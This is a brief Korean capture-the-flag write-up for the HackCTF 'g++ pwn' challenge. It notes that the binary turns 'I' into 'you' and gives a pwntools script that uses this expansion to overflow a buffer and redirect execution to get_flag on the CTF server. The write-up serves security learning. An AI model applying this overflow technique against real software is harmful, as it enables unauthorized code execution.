HackCTF
HackCTF - g++ pwn
shinobu
2021. 11. 21. 16:18
I 랑 you 가 있길래 터미널에 둘 다 썼더니
I 가 you로 바뀌는 것을 볼 수 있었다
이를 이용해 익스를 하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3011)
e = ELF('./gpwn', checksec=False)
payload = 'I'*20
payload += 'AAAA'
payload += p32(e.sym['get_flag'])
r.sendline(payload)
r.interactive()